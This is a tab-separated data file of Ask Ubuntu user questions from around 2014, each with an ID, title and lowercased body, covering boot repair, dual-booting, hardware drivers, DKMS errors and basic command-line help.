517327	recover windows boot partition	i am completely new with linux and on my holidays i decide to install ubuntu 14,04 , somehow i manage to delete the first partition sda1 100mb and can not boot on windows 7 any more . already tried boot-repair-disk and restore mbr but when it power up i get error boot mgr is missing . here is my report and fdisk results : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x12e5a217 device boot start end blocks id system /dev/sda2 * 206848 357322751 178557952 7 hpfs/ntfs/exfat /dev/sda4 357324798 976771071 309723137 f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 612847616 976771071 181961728 7 hpfs/ntfs/exfat /dev/sda6 357324800 612847615 127761408 83 linux partition table entries are not in disk order disk /dev/sdb : 3910 mb , 3910041600 bytes 95 heads , 3 sectors/track , 26795 cylinders , total 7636800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 63 7636799 3818368+ c w95 fat32 ( lba )
517328	help me please with installing ubuntu along side windows 7	how do i run ubuntu the newest update along side windows 7 . thank you . ps . if you could link a you tube video that would be fantastic .
517329	create and replace an existing directory ?	i have a directory name foo located in ~/desktop . suppose i want to create a directory from a terminal with same name and in the same location . when i tried mkdir it gave an error : mkdir : can not create directory `/home/nux/desktop/foo ' : file exists thats makes sense , but i want to replace foo if exists . i looked through man mkdir but there is n't any option that do that . so how to create and replace foo ? why does n't mkdir have an option to do do this ?
517332	booting ubuntu alongs side mac black screen appears	i am using mac os 10.9.4 and i am trying to boot ubuntu 13.10 alongside mac ( i need two os ) . i installed refit . also i burn the iso image of ubuntu and try to boot it from cd.. i got the refit menu along with the windows menu after i power on the mac ( pressing option key ) . but when i click window option a black screen appears and never goes out .
517333	automatic screen capture script	i 'm looking to accomlish exactly what anwar shah describes here bash script to take screenshot and save the image - ubuntu with the added functionality of setting a time increment for the script to continue taking screen captures . for example , i 'd like to be able to execute this script and have it take and export screen shots as jpegs every 5 seconds and continue until i kill the script . is there any simple solution to this ?
517337	switch user not working in xubuntu 14.04	when i click the switch user in the actions buttons in my panel , i get this message : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.displaymanager was not provided by any .service files i get the same message if i lock the screen and then select new login option ( i 'm using xscreensaver ) . if i type dm-tool switch-to-greeter in terminal i get into the login screen and can enter with a new user but that is not an elegant method . i want the actual buttons to work ! the other posts on this topic are either unresolved or do not work for me . any advice ? edit : this seems to be a bug . i filled a new bug here and there is a similar bug reported here .
517339	displaylink usb 3.0 not working on ubuntu 14.04lts	i noticed this might be yet another displaylink outcry - but i thought i give it a go anyway . so the usual story - i have got a displaylink adaptor kensington usb3.0 video adapter , and does n't look like is ever going to work . it is reorganised when i plug it in . # uname -r 3.13.0-35-generic # dmesg [ 52049.856134 ] usb 2-2 : new high-speed usb device number 8 using ehci-pci [ 52049.989282 ] usb 2-2 : new usb device found , idvendor=17e9 , idproduct=430f [ 52049.989290 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 52049.989295 ] usb 2-2 : product : kensington usb3.0 video adapter [ 52049.989299 ] usb 2-2 : manufacturer : displaylink [ 52049.989304 ] usb 2-2 : serialnumber : 10024214 [ 52059.384628 ] usbcore : registered new interface driver udlfb [ 52402.886345 ] usbcore : deregistering interface driver udlfb [ 52418.187053 ] usbcore : registered new interface driver udlfb [ 53522.914146 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] cache_error - ch 2 [ xorg [ 1276 ] ] subc 0 mthd 0x0060 data 0xbeef0201 i have blacklisted udl in /etc/modprobe.d/blacklist-custom.conf and removed removed udlfb from /etc/modprobe.d/blacklist-framebuffer.conf . i have also manually loaded the udlfb driver . # modprobe udlfb [ 52418.187053 ] usbcore : registered new interface driver udlfb ok so basically i am not moving forward with this - because when i do ; # ls /dev | grep fb fb0 is the only device block found - which indicates to me that udlfb is not detecting the device . udevadm info on fb0 reveals - it is the main laptop screen . # udevadm info -a -p $ ( udevadm info -q path -n /dev/fb0 ) looking at device '/devices/pci0000:00/0000:00:01.0/0000:01:00.0/graphics/fb0 ' : kernel== '' fb0 '' subsystem== '' graphics '' driver== '' '' attr { pan } == '' 0,0 '' attr { name } == '' nouveaufb '' attr { mode } == '' '' attr { console } == '' '' attr { blank } == '' '' attr { modes } == '' u:1440x900p-0 '' attr { state } == '' 0 '' attr { bits_per_pixel } == '' 32 '' attr { cursor } == '' '' attr { rotate } == '' 0 '' attr { stride } == '' 7680 '' attr { virtual_size } == '' 1920,1080 '' i currently have 1 provider and that is the main screeen . # xrandr -- listproviders providers : number : 1 provider 0 : id : 0x65 cap : 0x1 , source output crtcs : 2 outputs : 4 associated providers : 0 name : nouveau digging through /sys/class/graphicsi noticed fbcon with this settings : looking at device '/devices/virtual/graphics/fbcon ' : kernel== '' fbcon '' subsystem== '' graphics '' driver== '' '' attr { cursor_blink } == '' 0 '' attr { rotate } == '' 0 '' let me also mentioned that i have tried udl with udlfb blacklisted with no joy neither . ok so long story short - is anyone managed to get similar displaylink usb 3.0 adaptor working with ubuntu 14.04 lts or similar ?
517340	recovering lost folder name:	can i recover a folder name accidentally lost in renaming ? i 've just done a complete installation , formatting everything , from 12.04 lts to 14.04 lts . the plan was to slot my mozilla profile from my backed up copy into the new version , simply renaming the old one , to replace the new .default folder which came with the installation so that firefox would find my slotted in folder instead . it worked fine on thunderbird , but on firefox i somehow accidentally deleted the name of the .default folder i need to replace . this means i do n't know what to call the one i 'm slotting in . is there a way , please , of recovering the name i deleted ? thanks for help in advance . i 'm on ubuntu 14.04 lts , processor amd athlon ( tm ) 64 x2 dual core processor 5200+ ă 2 , memory 2.0 gib , os type 32 bit , disk 155.3 gb .
517341	ubuntu 14.04 / hp3520 printer driver	i 've just upgraded to ubuntu version 14.04 from 12.04 but i can not now print to my hp3520 printer anymore . any advice / suggestions ? do i need to find / re-install a driver ? if so how and where from ? thanks
517342	wifi disabled , no hardware switch available , rfkill list reads `` hard blocked '' anyway on an acer aspire one	somehow , my nephew ( who destroys everything he touches ) has managed to disable the wifi on his acer aspire one series netbook ( model # zg5 ) . it 's running 14.04 lts ( 32-bit ) . rfkill list indicates it 's not soft blocked , but hard blocked . however , there is no wifi switch on this particular model , and no fn key shortcut , either . i 've scoured the internet ... but none of the solutions i 've found so far seem to work . any advice ? i 've looked at this question and it does n't apply to me : wireless disabled by hardware switch on an asus x550v
517344	windows 7 wo n't boot from grub ( uefi )	everyone . after having installed ubuntu on my desktop windows 7 wo n't run . there 's a menuentry in the grub called `` windows 7 '' but when i press it nothing happens - the grub 's menu just reappears . i have efi installed on my sony vaio s15 instead of bios . here is the log from boot-repair : http : //paste.ubuntu.com/8173314/ i would appreciate any help u can give me . thanks in advance . alexey .
517345	give file permissions back to root	i accidentally typed out this command , not knowing exactly what it did : sudo chown -r user : user / now when i type ls -la / , it shows that user has permission to all directories ( before it showed root only ) . how do i revert it back to root ?
517347	when i enter this code , it gives me `` fatal error : iostream : no file found.. help ?	# include < iostream > using namespace std ; int main ( ) { int age ; int new_age ; cout < < `` please enter your age : : : `` ; cin > > age ; new_age = age + 1 ; cout < < `` next year you will be `` < < new_age < < `` old.\n '' ; cout < < `` thank you for using my program ! '' < < endl ; return 0 ; }
517350	bluetooth does not work - `` ca n't load firmware '' - vaio - ubuntu 14.04	everything goes well with my new vaio laptop except the bluetooth . it is recognized in some way but it does not work . i have already looked in askubuntu for similar cases but i do n't find a solution anyway . i did this : ~ $ dmesg | grep -i blue [ 12.662286 ] bluetooth : core ver 2.17 [ 12.662306 ] bluetooth : hci device and connection manager initialized [ 12.662314 ] bluetooth : hci socket layer initialized [ 12.662317 ] bluetooth : l2cap socket layer initialized [ 12.662323 ] bluetooth : sco socket layer initialized [ 12.701731 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 12.701735 ] bluetooth : bnep filters : protocol multicast [ 12.701742 ] bluetooth : bnep socket layer initialized [ 12.859623 ] bluetooth : rfcomm tty layer initialized [ 12.859635 ] bluetooth : rfcomm socket layer initialized [ 12.859640 ] bluetooth : rfcomm ver 1.11 [ 81.946726 ] bluetooth : ca n't load firmware , may not work correctly [ 84.923846 ] bluetooth : ca n't load firmware , may not work correctly ~ $ rfkill list 0 : sony-wifi : wireless lan soft blocked : no hard blocked : no 1 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no so i tried to install linux-firmware as suggested in a question here but it says i have the last version yet . also i found a suggestion about restarting gnome-bluetooth but it did n't work . any idea ? thanks a lot !
517353	can anybody explain what ls -l do ?	can anybody explain what ls -l do ? i 'm new to command line functions so simple explanation would suffice . thank you . for my reference the results i get when i typed ls -l was : drwxrwxr-x 3 student student 4096 aug 26 12:25
517354	terminal method of formatting storage drive	i want to know how to format a storage drive from the terminal . helpful things to provide in the answer would be often used options for commands and base knowledge that one can use to extrapolate future uses . specifically i would like to know how to format in the different file systems such as ntfs , fat32 , ext4 , etc . information on how to partition the drive via terminal is also wanted . i am trying to format a high capacity external hard drive ( ehdd ) into ntfs - from the terminal . i know i can use gparted for this as well as other gui programs , but i still want to now how to do it from the terminal .
517355	boot failure - previously testdisk was installed	i ask for help on the constant boot failure situation . i run a 12.04lts on a acer 4736z laptop . i tried to install testdisk . but this caused failure to mount externel usb hdd . then i removed testdisk with apt-get -- purge autoremove testdisk . the system has n't been able to start since this remove . the boot stops every time on the line like this : stopping system v runlevel compatibility . thanks for any help in advance
517356	charm using rabbitmq	here is problem : 1 ) i have a rabbitmq on juju 2 ) i have a charm , it tries to use rabbitmq , written by java , i 'll call it mycharm . 3 ) mycharm needs hostname or ip address of rabbitmq how can i find the ip address or hostname of rabbitmq on my juju ? thnaks
517358	problems with grub	hi guys how are you ? i 'm asking for help because i have a problem with grub , i think that i have the grub of a correct form , but always that i 've installed ubuntu never start with it . i do n't have other o.s . in my pc just ubuntu 14.04 , windows disappeared of my computer and always appear this message : http : //oi61.tinypic.com/amzipv.jpg my grub : http : //oi60.tinypic.com/xbz8k7.jpg i have to press f9 and select my start option ( cd , usb , ubuntu , etc.. ) thanks for your help !
517360	how to enable my flashdrive while im in the bios setup utility	im trying to install ubuntu 32bits on my asus eee pc . i want to install it over windows xp home edition , using my 8gb flashdrive . on my flashdrive i have universal-usb-installer 1.9.5.5 by pendrivelinux also on the drive i have install ubuntu with the ubuntu logo . i have downloaded ubuntu-14.04.1-desktop-i386 , it has the power iso logo in front of it.now with all that said . everythings working until i get to my bios setup utility im typing everything that is under the boot tab . hard drive disk 1st drive [ hdd : pm-hitachi hts ] 2nd drive [ usb : myflashdrive dt ] options hdd : pm-hitachi hts 543216l9sa00 [ disabled ] usb : myflashdrive dt [ disabled ] boot device priority 1st boot device [ hdd : pm-hitachi hts ] disabled 2nd boot device [ removable dev . ] disabled 3rd boot device [ atapi cd-rom ] disabled boot setting configuration quiet boot [ enabled ] on board lan boot rom [ disabled ] boot loader [ enabled ] my question is how do i enable my flashdrive so i can boot up . help ! i also tried the ubuntu cd helper , i get a error message . could not retrieve the installation files . for more info , see the log files . i went thru the uncheck hidden files process , that did n't work either . please help i want my ubuntu
517363	make a bootable disc with both 64bit and 32bit versions ?	is it possible to make a disc to install ubuntu that has the option of both the 32bit version and 64bit version ?
517367	grub menu does not appear on screen , but both win 8.1 and ubuntu 14.04 present and working	my first time at ask ubuntu , please let me know if you need some more details . configuration : lenovo ideacenter k410 intel pentium g2020 16 gb ram crucial mx100 256 gb ssd setup : i have an ubuntu 14.04 and win 8.1 dual boot setup . had been using it for more than 2 months , was working properly till a couple of weeks ago . problem : the grub menu does not appear . but both os are present and work properly . that is , the monitor shows nothing but a blank screen but i presume that grub is still working . i confirmed it by doing the following , blindly pressing and holding the down arrow for a good 5 sec and then when i hit enter , it boots into windows 8.1 . now everything is working fine in the windows world . when i do nothing when the computer starts , after the 10 second time out it automatically boots into ubuntu 14.04 . i presume this happens because ubuntu was the default highlighted option after grub was installed . thus i confirmed that both os are working . i wanted to confirm that this was not some glitch and that grub would be displayed again . but one week has passed and grub does not `` appear '' . both os are working fine till date . please help . thanks in advance . let me know if i need to post any additional details .
517368	cant install draftsight on 12.04	i 'm having trouble installing draftsight for 12.04 . at first , i had plenty of errors but those have been resolved . it appears that everything runs smoothly , but afterwards the program will not launch . villa @ villa-imac : ~ $ sudo dpkg -i draftsight.deb [ sudo ] password for villa : ( reading database ... 226709 files and directories currently installed . ) preparing to unpack draftsight.deb ... access control disabled , clients can connect from any host access control disabled , clients can connect from any host access control enabled , only authorized clients can connect access control enabled , only authorized clients can connect unpacking draftsight ( 2014.5.60 ) over ( 2014.5.60 ) ... setting up draftsight ( 2014.5.60 ) ... villa @ villa-imac : ~ $ please help . i 've been working on this for the last 2 days , but it appears i have made no progress today .
517369	need help adding a remote storage ubuntu 13.10	im trying to root my droid bionic and im having trouble creating a remote storage . every time i tap connect i get back a window saying `` network error . there is a problem in your network connection with remote host . please repair your network and try again . '' this the source i am following http : //rootzwiki.com/topic/40378-rooting-droid-bionic-412/page-2 does anyone know what i might be doing wrong ?
517371	why am i not seeing all the system settings ?	i just installed ubuntu for the first time ( switched from a mint ) , and i 'd like to set my preferences , which are , among other things , disabling cleartype altogether and moving some keys around ( caps lock , shift and ctrl , just to name them , that 's irrelevant to the question ) . i found some answers but all suggest that i should see certain tabs in the control center that i 'm not seeing . namely , in the appearance panel , i get no fonts tab and , in the keyboard panel , i get no layouts tab . i tried to run unity-control-center as root to no avail . i also tried to stfw and found nothing . what am i missing ?
517375	how do i fix this error ? dkms.conf : error ! no 'built_module_name ' directive specified for record # 0 error ! bad conf file	i am using ubuntu 14.04.1 lts does anyone know how to fix this dkms.conf error ? dkms.conf : error ! no 'built_module_name ' directive specified for record # 0 . error ! bad conf file . file : does not represent a valid dkms.conf file . setting up linux-headers-generic ( 3.13.0.35.42 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6.3 ) ... dkms status bbswitch , 0.7 , 3.13.0-34-generic , x86_64 : installed bbswitch , 0.7 , 3.13.0-35-generic , x86_64 : installed nvidia-331-updates , 331.38 , 3.13.0-34-generic , x86_64 : installeddkms.conf : error ! no 'built_module_name ' directive specified for record # 0 . error ! bad conf file . file : does not represent a valid dkms.conf file . nvidia-331-updates , 331.38 , 3.13.0-35-generic , x86_64 : installed ls -r /var/lib/dkms /var/lib/dkms : bbswitch dkms_dbversion nvidia-331-updates xpad /var/lib/dkms/bbswitch : 0.7 kernel-3.13.0-34-generic-x86_64 kernel-3.13.0-35-generic-x86_64 /var/lib/dkms/bbswitch/0.7 : 3.13.0-34-generic 3.13.0-35-generic build source /var/lib/dkms/bbswitch/0.7/3.13.0-34-generic : x86_64 /var/lib/dkms/bbswitch/0.7/3.13.0-34-generic/x86_64 : log module /var/lib/dkms/bbswitch/0.7/3.13.0-34-generic/x86_64/log : make.log /var/lib/dkms/bbswitch/0.7/3.13.0-34-generic/x86_64/module : bbswitch.ko /var/lib/dkms/bbswitch/0.7/3.13.0-35-generic : x86_64 /var/lib/dkms/bbswitch/0.7/3.13.0-35-generic/x86_64 : log module /var/lib/dkms/bbswitch/0.7/3.13.0-35-generic/x86_64/log : make.log /var/lib/dkms/bbswitch/0.7/3.13.0-35-generic/x86_64/module : bbswitch.ko /var/lib/dkms/bbswitch/0.7/build : bbswitch.c dkms.conf makefile /var/lib/dkms/nvidia-331-updates : 331.38 kernel-3.13.0-34-generic-x86_64 kernel-3.13.0-35-generic-x86_64 /var/lib/dkms/nvidia-331-updates/331.38 : 3.13.0-34-generic 3.13.0-35-generic build source /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-34-generic : x86_64 /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-34-generic/x86_64 : log module /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-34-generic/x86_64/log : make.log /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-34-generic/x86_64/module : nvidia_331_updates.ko /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-35-generic : x86_64 /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-35-generic/x86_64 : log module /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-35-generic/x86_64/log : make.log /var/lib/dkms/nvidia-331-updates/331.38/3.13.0-35-generic/x86_64/module : nvidia_331_updates.ko /var/lib/dkms/nvidia-331-updates/331.38/build : conftest.sh g_nvreadme.h nv-chrdev.c nv-frontend.c nv.h nv-memdbg.h nv-p2p.c nv-reg.h nv-vm.c os-registry.c rmretval.h conftest.sh.orig makefile nv.c.orig nv-frontend.h nv-i2c.c nv-mempool.c nv-p2p.h nvtypes.h nv-vtophys.c os-smp.c xapi-sdk.h cpuopsys.h makefile.orig nv-cray.c nv_gpu_ops.h nvidia-modules-common.mk nv-misc.h nv-pat.c nv-usermap.c os-interface.c os-usermap.c dkms.conf nv-acpi.c nv-drm.c nvgputypes.h nv-kernel.o nv-mlock.c nv-procfs.c nv_uvm_interface.c os-interface.h patches gcc-version-check.c nv.c nverror.h nv-gvi.c nv-linux.h nv-mmap.c nv-proto.h nv_uvm_interface.h os-pci.c rmil.h /var/lib/dkms/nvidia-331-updates/331.38/build/patches : allow_sublevel_greater_than_5.patch buildfix_kernel_3.11.patch buildfix_kernel_3.6.patch register-vt-switch-requirements.patch buildfix_kernel_3.0.patch buildfix_kernel_3.13.patch buildfix_kernel_3.8.patch replace-vm_reserved-with-vm_dontexpand-and-vm_dontdu.patch buildfix_kernel_3.10.patch buildfix_kernel_3.14.patch make-use-of-the-new-uapi-framework.patch /var/lib/dkms/xpad : 0.1 kernel-3.13.0-34-generic-x86_64 /var/lib/dkms/xpad/0.1 : 3.13.0-34-generic build source /var/lib/dkms/xpad/0.1/3.13.0-34-generic : x86_64 /var/lib/dkms/xpad/0.1/3.13.0-34-generic/x86_64 : log module /var/lib/dkms/xpad/0.1/3.13.0-34-generic/x86_64/log : make.log /var/lib/dkms/xpad/0.1/3.13.0-34-generic/x86_64/module : xpad.ko /var/lib/dkms/xpad/0.1/build : dkms.conf makefile xpad.c
517376	does ubuntu work with coreboot ?	rather , when installed , would the grub be configured properly , or will ubiquity be confused because it does not find the bios ?
517378	how do i remap keys ( delete to insert ) in ubuntu 14.04 ?	my del key does n't work in my keyboard . i want to reassign it to the ins key , as i use del a lot more often than ins , but i ca n't find any preference or tweak tool to remap normal keys . i somehow had it done in the previous version ( saucy salamander ) , but now that i upgraded to 14.04 it does n't work anymore .
517380	want to setup acl but my /etc/fstab does not look like the docs	i am trying to install an acl on an ubuntu 14 box . my /etc/fstab file does not look exactly like the docs and i would like some advice on how to proceed . here is my config . $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/vda1 during installation uuid=050e1e34-39e6-4072-a03e-ae0bf90ba13a / ext4 errors=remount-ro 0 1 where do i put the acl ? after errors=remount-ro ? just want to check that i am implementing this very low level stop correctly . thanks .
517382	fan keeps turning on/off everytime i use a browser on acer aspire with ubuntu 14.04	well i think the title is specific enough . some notes of what i already tried to do : installed lm-sensors and added coretemp to modprobe.d installed tlp nothing of this seemed to work . i also have acpi_osi=linux and acpi_backlight=vendor on my grub . please , help me ! its getting really annoying listening to the sound of the fan turning on , and after 5 seconds going off . and this happens every 30 seconds .
517383	installing programs using live cd	i do n't have admin rights on my computer , so i ca n't install any programs . i was wondering if i use the ubuntu live cd , can i use that to install programs on a flash drive , then reboot into windows and be able to run those programs off of the flash drive in windows ?
517385	how to search tags not matching pattern	in my xml file , i have many location tags . eg : < location > file : ///home/faizal/music/the % 20doors/studio % 20albums/2007 % 20infected % 20mushroom % 20presents % 20- % 20the % 20doors % 20remixed % 20 ( 2 % 20cd ) % 20 @ 320/cd2/07 % 20break % 20on % 20through % 20 ( infected % 20mushroom % 20guitar % 20rmx ) .mp3 < /location > i would like to find all location tags that do not start with file : ///home/faizal/music/ . how would i go about writing a vim command to do this ? the below command does not exclude lines with the file : ///home/faizal/music/ pattern . what am i doing wrong ? /^\ ( .*\ < location\c\ > \ ) \ & \ ( . *file\ : \/\/\/home\/home\/faizal\/music\ ) \ @ !
517386	is ubuntu server only available with the command line ?	one day my company is going to need a server , and i like ubuntu since it has the least amount of viruses out of all the oses ( i think ) , but when i look at the ubuntu server it only has black background and white text , which is command line . is that all to ubuntu server ? or is it like ubuntu desktop , and a modules for command line ? i do n't really want it to just be the command line . i 'm new to the ubuntu os stuff . even now i still use windows .
517387	how do i open .cpp file from the github directory ?	i 'm a total newbie here . how do i open .cpp file from the github directory ? what command should i use ? i 'm in the directory where the .cpp file is stored but i do not know how to open that in the terminal .
517390	ca n't run .sh file	hi i am returning user of ubuntu , and i am trying to get label , and the problem how to run two files sh files in the terminal called : install-sh.sh configure.sh and i have tried to enter from the terminal : sudo sh /home/downloads/lxpanel-0.6.1/install-sh.sh and it ask for the password so further , and i type it in , and then it says in the terminal : sh : 0 : ca n't open /home/downloads/lxpanel-0.6.1/install-sh.sh and i have also tried from root in the terminal , and i do n't know how i can make this work , and can some one please help .
517392	how to enable cd/dvd drive to standby and wait for physical media	i have a server running ubuntu server 14.04 lts that i am using to run virtual machine guests , i have one running windows 7 , i want to be able to do some things off this like burning cds . but when i put a dvd into the drive and try to double click on the dvd it says `` please insert a disk '' . i have tried hitting connect > cdrom or dvd > device media : /dev/cdrom and /dev/sr0 but when i hit run it says can not find medium and does n't allow it to boot . i 'm not sure what i can do to enable the cd/dvd drive to just work as if it was the actual os .
517394	trying to make bootable usb on os x -- the disk you inserted was not readable by this computer ? ?	so i formatted the usb thing to fat , i tried using a 4gb and then figured maybe it 's the disk so then i used a 2gb and got the same errors . followed the instructions just as they are on the page ... http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx i do the install command and i can see the lights start to go on my usb drive like it 's being used ... it continues for a few minutes and then i get this error pop up that says the `` disk you inserted was not readable by this computer '' what 's wrong here ? i 'm following all of these instructions properly and i 've tried it several times each way . using osx 10.9.4 and trying to get a bootable usb so i can install ubuntu on another partition . i do n't have a cd drive so i ca n't do that . by the way , it says under step 3 in a note : that osx adds the .dmg to the file so it comes out like blabla.img.dmg after the conversion . am i supposed to edit the name of the file and remove that .dmg at the end or keep it ? it does n't say what to do about it in the instructions .
517398	how to dual boot windows 8 and windows 7 seperately with burg	ok , so here is my problem : i am quite new to ubuntu , but i managed to install the burg graphical bootloader.now , my problem is that along with ubuntu , i also have windows 7 and windows 8 installed in a triple boot setup.so , when i want to go to windows 8 by clicking the icon , i go to the windows boot manager setting.this is my problem , as i actually want to use 1 icon to boot to win8 and the other to boot to win7.so , can anyone explain me how to do that.also when i see the superboot menu , they only have win8 listed in the prefrences.why is that so ? i would appreciate it if anyone could answer me .
517402	ubuntu 12.04 lts dell inspiron 3137 - wifi issue rectified but wifi data card not working anymore	i installed ubuntu 12.04 lts on my new dell inspiron 3137 . initially when i inserted the wifi data card ( its a tata photon max wifi data card ) , it connected as wired connection and i could access the internet . but wifi was not working - not even shown in the list . so after much research finally found that the wireless card is atheros and that drivers are missing .. etc found this post : wifi not working on ubuntu 12.04 dell 3521 and as suggested by chili555 , tried sudo apt-get install linux-backports-modules-cw-3.8-precise-generic and wifi started working . but after re-boot , the wifi is still working but the dongle inserted does n't get detected even as wired connection . lsusb is showing the device . tried configuring-tata-photon-usb-modem-huawei-ec156 with the numbers i got from lsusb and after some text this is the result inquiring device details ; driver will be detached ... looking for active driver ... usb error : could not get bound driver : no data available no driver found . either detached before or never attached and cursor is blinking expecting me to do something . additionally , when i plug in the wifi data card , it seems to be blinking but its not showing up as wireless on my other dell xps machine . if i plug it into the xps , the wireless is shown on this inspiron . somebody please help.. i am afraid to try too much on my own because getting the wifi working itself was half-day job , now if it stops working , i will be in soup . i will be travelling shortly and wifi working is an absolute must.. i can live without the wifi data-card capabilities as i will be leaving it behind at home and i doubt very much that the university/hotel i am visiting will give me a dongle : p note : ethernet connection ( wifi data card - > router - > lan wire - > laptop ) is working . any help will be much appreciated .
517404	ubuntu 14.04 remove autohide menu bar	in ubuntu 14.04 menu bars appears when you mouse over them on the top panel . this is the case for nautilus and other applications . this really irritates me as sometimes it hangs up in appearing . i want to have windows like menu bars in ubuntu . how do i do that ?
517407	carnegie learning on ubuntu ( chromebook )	i recently invested in a chromebook , little did i realize it would n't run a crucial program my online school uses . so , i installed ubuntu so i can toggle between the two via keyboard . the ubuntu version seems oldschool , i believe it is 12.04 . it 's very very simple . all i need it to do essentially is to allow me to access carnegie learning . i log onto my school site , click the assignment link , which brings me to a page which has a link that says launch carnegie learning . i click it , it beings up the all familiar loading page , the load bar fills , and bam . window closes . it 's very frustrating . does anyone have any experience with this ? the package installer that came with this version is gdebi package installer . when i click on it , it comes up and is completely unusable . ca n't click anything . if anyone can give me some sound , simple advice , i would greatly appreciate it .
517409	xubuntu backlit keyboard not working on 14.04	xubuntu 14.04 backlit keyboard not working on samsung series 7 np730u3e with voria ppa and samsung-tools installed . works fine with ubuntu/kubuntu 14.04 but prefer xfce though gather xfce is likely the issue .
517410	xeyes in each of my ubuntu 14.04 install is missing the title bar	i often bring up xeyes to test x11 display , especially when checking out my remote x sessions . however , without a title bar , it 's not easy to close . i have to kill the window instead . does anyone know how to bring the title bar back to xeyes ? some clarifications . there are reasons that i use the title bar in windows which includes grabbing resource for moving ( alt mouse cursor fails in a virtual machine ) . i at times send the xeyes to my real machine as an easy visual that the remote machine is alive . the missing title bar/boards makes it impossible ( for me ) to re-size it . when there were borders i use to make it extremely small , make it always on top , and move it to a convenient location away from my other work . i also miss being able to put it available on all workspaces . i guess if i ask a question for each of the needs i could probably get most of the things done with some type of workaround . however , i find the title bar a convenient tool for quickly and conveniently working with a window . my `` real '' question is , does anyone know of a way to invoke the title bar in xeyes .
517411	something went wrong with my drive and it wo n't boot ubuntu anymore . how do i fix this ?	i was using windows for a bit because i 'm still seeing up all the programs on it following a hard drive failure . one thing seagate said to do was run seatools . when i did , it did n't really say which drive was which ( i have two , a 1tb with win7 and a 250gb for ubuntu ) so i ran the smallest scan on both drives . i have n't done anything else with that tool . then i restarted , trying to get back to ubuntu . but it fails to boot . it says something like disk error . i have the install disk for both oses . what can i do to repair my ubuntu install ? i ran boot repair from a live disk . result is here : http : //paste.ubuntu.com/8169843/
517413	how do ubuntu flavors compare regarding resource consumption and performance ?	minimum requirements statistics do not provide enough accurate info to new and prospective users trying to determine a suitable flavor for their machine . people need to know if an os will run smoothly on their hardware . we need the ability to easily compare ubuntu flavors in terms of resource usage and management . points of interest include : performance responsiveness under load ( e.g . firefox open with 10 tabs ) menu/dash speed resource usage memory usage hard drive usage 3d graphics requirements this data could be depicted using bar graphs and with different versions ( 13.04 , 13.10 , 14.04 , etc ) in separate graphs but most important are the latest versions . how do they compare under standard use case scenarios such as using firefox , libreoffice , or watching full screen flash videos or netflix ? will my machine be snappy and responsive running ubuntu or am i better off with lubuntu or xubuntu ? what are the minimum system requirements for a reasonable speedy and responsive system ? official minimum hardware requirements specifications do not provide this info .
517414	installing ubuntu touch on samsung note 10.1 and sony xperia z ultra	i intend to install ubuntu touch on samsung note 10.1 and sony xperia z ultra . i have seen few forums and have n't got a clear picture of what is working and what is not . i saw for note 10.1 there is working version but discontinued . i was hoping if someone could give me a clear picture of what 's the current status . also i used bbm a lot for work reasons and just wanted to check if its working on ubuntu ?
517415	alt key not recognized	in ubuntu 14.04 my alt key is not longer recognized . this effects all users i have changed the input method from ibus to non and back no change . if i runxev i get an output for every key but the alt neither left or right . i have spent a few days on google trying to get an answer but maybe i 'm search the wrong thing ?
517417	queries about ubuntu touch	i want to install ubuntu touch on my nexus 4 but , before installing i want to know that whether the basic applications can be installed on it , like twitter , google maps , banking apps and others , what is the average battery life i would get after installing ubuntu touch.does it have any network issues .
517418	pre requirements missing when installing oracle database 11g ubuntu	i 'm trying to install oracle database 11g on ubuntu 14.04 . at the middle of executing ./runinstaller i 'm getting following messages saying about missing prerequisites . this is a prerequisite condition to test whether the package `` make-3.80 '' is available on the system . ( more details ) expected value : make-3.80 actual value : missing this is a prerequisite condition to test whether the os kernel parameter `` semmni '' is properly set . ( more details ) expected value : 128 actual value : 0 this says make is missing but , when i run 'make -v ' as root or oracle , it gives following output . gnu make 3.81 copyright ( c ) 2006 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . this program built for x86_64-pc-linux-gnu also even though it says os kernel parameter semmni not set to 128 , when i run `` /sbin/sysctl -p '' as root , it gives following which says semmni set to 128. kernel.sem = 250 32000 100 256 kernel.shmall = 2097152 kernel.shmmni = 4096 kernel.shmmax = 1073741824 net.ipv4.ip_local_port_range = 9000 65500 net.core.rmem_default = 262144 net.core.rmem_max = 4194304 net.core.wmem_default = 262144 net.core.wmem_max = 1048576 fs.aio-max-nr = 1048576 fs.file-max = 6815744 vm.hugetlb_shm_group = 1001 what is the issue here ?
517423	can i get the document viewer evince in windows	i want to get document viewer of ubuntu working in windows 7 , is there any way to do it ? if yes then please guide me through that .
517424	dual booting problems windows 8.1/ubuntu 14.04 separate hard drives	i have windows 8.1 on one hard drive and ubuntu 14.04 on a second hard drive ( installed in a hp desktop ) . my problem is that being a newbie i can not get ubuntu to boot . i tried a few things ( i.e . easybcd ) and none have worked . where or what have i done wrong ?
